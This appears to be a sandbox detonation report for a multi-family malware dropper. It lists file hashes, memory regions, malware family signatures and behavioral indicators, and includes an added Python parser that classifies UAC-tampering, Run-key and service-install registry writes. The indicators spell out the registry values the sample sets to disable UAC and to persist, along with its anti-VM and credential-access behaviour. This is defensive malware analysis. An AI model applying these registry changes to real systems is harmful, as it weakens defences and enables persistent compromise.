memory/2972-40-0x0000000002490000-0x0000000002590000-memory.dmp

memory/2464-63-0x0000000000400000-0x000000000044F000-memory.dmp

memory/2464-61-0x0000000000400000-0x000000000044F000-memory.dmp

memory/2464-60-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2564-211-0x0000000005080000-0x000000000662A000-memory.dmp

memory/700-241-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/700-257-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Roaming\mediaget.exe

MD5 8eedc01c11b251481dec59e5308dccc3
SHA1 24bf069e9f2a1f12aefa391674ed82059386b0aa
SHA256 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d
SHA512 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

C:\Users\Admin\AppData\Local\Temp\HD_X.dat

MD5 696a7236e14e7407b5023681fba1d690
SHA1 43c550a8ab63b5f5a2a2622e5f614c4aaeeaf78e
SHA256 af034321362311726b4f39f658d691b7cf2ddf6eccd13f771532abde387f720a
SHA512 4582231dde50799d1925ba884e6e9d4bfde0a7ca56ee0f9d7bb0ccea18cbb73bda8bdf4de387537ade3d0be5c496f5748346c91806da72f7bf2e0fd814a6d0a0

memory/2096-237-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-233-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-229-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-226-0x0000000005FC0000-0x0000000006382000-memory.dmp

C:\ProgramData\kaosdma.txt

MD5 2c807857a435aa8554d595bd14ed35d1
SHA1 9003a73beceab3d1b1cd65614347c33117041a95
SHA256 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b
SHA512 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9

memory/2096-223-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-220-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-218-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2564-210-0x0000000005080000-0x000000000662A000-memory.dmp

memory/2096-240-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/1536-288-0x00000000002C0000-0x00000000002CC000-memory.dmp

memory/1536-291-0x00000000002D0000-0x00000000002DC000-memory.dmp

memory/1536-290-0x00000000002F0000-0x00000000002FC000-memory.dmp

memory/1536-289-0x00000000002E0000-0x00000000002EA000-memory.dmp

memory/700-209-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/2096-214-0x0000000000400000-0x00000000019AA000-memory.dmp

memory/2232-53-0x0000000000400000-0x0000000000625000-memory.dmp

C:\Users\Admin\AppData\Roaming\test.exe

MD5 7e50b292982932190179245c60c0b59b
SHA1 25cf641ddcdc818f32837db236a58060426b5571
SHA256 a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8
SHA512 c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885

memory/1528-13-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/1528-12-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/2464-316-0x0000000000400000-0x000000000044F000-memory.dmp

memory/3048-320-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1028-319-0x0000000000400000-0x0000000000491000-memory.dmp

memory/2852-318-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2852-323-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2852-322-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1792-327-0x0000000000AE0000-0x0000000000B74000-memory.dmp

memory/2564-328-0x0000000005080000-0x000000000662A000-memory.dmp

memory/2096-329-0x0000000000400000-0x00000000019AA000-memory.dmp

memory/1528-354-0x0000000001AA0000-0x0000000002020000-memory.dmp

memory/2904-355-0x000000013F3C0000-0x000000013F940000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\259457134.bat

MD5 3880eeb1c736d853eb13b44898b718ab
SHA1 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6
SHA256 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
SHA512 3eaa3dddd7a11942e75acd44208fbe3d3ff8f4006951cd970fb9ab748c160739409803450d28037e577443504707fc310c634e9dc54d0c25e8cfe6094f017c6b

memory/2904-397-0x000000013F3C0000-0x000000013F940000-memory.dmp

memory/1528-396-0x0000000001AA0000-0x0000000002020000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 19:14

Reported

2024-12-04 19:18

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

219s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Azorult

trojan infostealer azorult

Azorult family

azorult

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fickerstealer

infostealer fickerstealer

Fickerstealer family

fickerstealer

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

HawkEye

keylogger trojan stealer spyware hawkeye

Hawkeye family

hawkeye

NanoCore

keylogger trojan stealer spyware nanocore

Nanocore family

nanocore

Njrat family

njrat

Oski

infostealer oski

Oski family

oski

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

Redline family

redline

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A

Xmrig family

xmrig

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\a.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\QAssist.sys C:\Windows\SysWOW64\TXPlatforn.exe N/A
File created C:\Windows\system32\drivers\hitmanpro37.sys C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
File opened for modification C:\Windows\system32\drivers\hitmanpro37.sys C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\240629765.txt" C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" C:\Windows\SysWOW64\TXPlatforn.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\gay.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\gay.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\a.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
N/A N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Windows\Help\Winlogon.exe N/A
N/A N/A C:\Windows\Cursors\WUDFhosts.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37 C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37.sys C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 185.228.168.9 N/A N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Internet Explorer\\fr-FR\\SearchApp.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\Resources\\Ease of Access Themes\\schtasks.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Default User\\winlogon.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Monitor = "C:\\Program Files (x86)\\SCSI Monitor\\scsimon.exe" C:\Users\Admin\AppData\Roaming\Opus.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
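The UAC bypass, Run key and service entries in the tables above all arrive as free-text `Set value (type) key = "value" process` rows. The Python below is an added example, not part of the report, that parses such rows and sorts them into the three behaviours that matter here: UAC policy values forced to 0 (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop), Run-key persistence with the launched path extracted from the quoted value, and service registration (a `.sys` ImagePath means a kernel driver is being installed; a svchost-hosted ServiceDll with a non-`.dll` extension, like the `240629765.txt` here, deserves a look on its own). Read-only `Key value queried` rows are ignored. The rows are copied from this section; the category names are mine.

```python
import re
from collections import defaultdict

# Constructed sample: indicator rows copied from this report's UAC bypass, Run key and service tables.
INDICATOR_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\a.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\Resources\\Ease of Access Themes\\schtasks.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" C:\Windows\SysWOW64\TXPlatforn.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\240629765.txt" C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
"""

# 'Set value (type) <key> = "<value>" <process> <target>'; the value is the last quoted span on the line.
SET_VALUE = re.compile(r'^Set value \((?P<type>\w+)\) (?P<key>.+?) = "(?P<raw>.*)" (?P<proc>.+?) (?P<target>\S+)$')
SERVICE_KEY = re.compile(r"\\Services\\([^\\]+)\\(ImagePath|Parameters\\ServiceDll)$")
UAC_VALUES = {
    "EnableLUA": "uac_disabled",
    "ConsentPromptBehaviorAdmin": "uac_silent_elevation",
    "PromptOnSecureDesktop": "uac_secure_desktop_off",
}
POLICY_KEY_SUFFIX = "\\Policies\\System"


def unescape(raw):
    """Undo the report's escaping of quotes and backslashes inside the value."""
    return raw.replace('\\"', '"').replace("\\\\", "\\")


def launched_path(value):
    """First quoted path of a Run value (or the whole value when unquoted)."""
    return value[1:value.find('"', 1)] if value.startswith('"') else value


def classify(row):
    m = SET_VALUE.match(row)
    if not m:
        return None                                   # reads and non-registry rows are ignored
    key, value, proc = m["key"], unescape(m["raw"]), m["proc"]
    parent, _, name = key.rpartition("\\")
    if parent.endswith(POLICY_KEY_SUFFIX) and name in UAC_VALUES and value == "0":
        return {"category": UAC_VALUES[name], "process": proc, "detail": f"{name}=0"}
    if "\\CurrentVersion\\Run\\" in key:
        return {"category": "run_key_persistence", "process": proc, "detail": launched_path(value)}
    svc = SERVICE_KEY.search(key)
    if svc:
        service, what = svc.group(1), svc.group(2)
        if what == "ImagePath":
            cat = "kernel_driver_install" if value.lower().endswith(".sys") else "service_image_path"
        else:
            cat = "svchost_service_dll" + ("" if value.lower().endswith(".dll") else "_nonstandard_ext")
        return {"category": cat, "process": proc, "detail": f"{service} -> {value}"}
    return {"category": "other_registry_write", "process": proc, "detail": f"{key}={value}"}


def summarize(text):
    findings = [f for f in (classify(line) for line in text.splitlines()) if f]
    per_proc = defaultdict(set)
    for f in findings:
        per_proc[f["process"]].add(f["category"])
    return {
        "findings": findings,
        "per_process": {p: sorted(c) for p, c in per_proc.items()},
        "uac_tampering": sorted(p for p, c in per_proc.items() if any(x.startswith("uac_") for x in c)),
    }


if __name__ == "__main__":
    for f in summarize(INDICATOR_ROWS)["findings"]:
        print(f["category"], "|", f["process"], "|", f["detail"])
```

Grouping by process is the useful view: here `3.exe` both disables UAC prompting and registers two Run entries, which is the pairing a responder wants surfaced together rather than as two separate signature hits.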

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Indicator Removal: File Deletion

defense_evasion

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Windows\SysWOW64\240629765.txt C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File opened for modification C:\Windows\SysWOW64\ini.ini C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
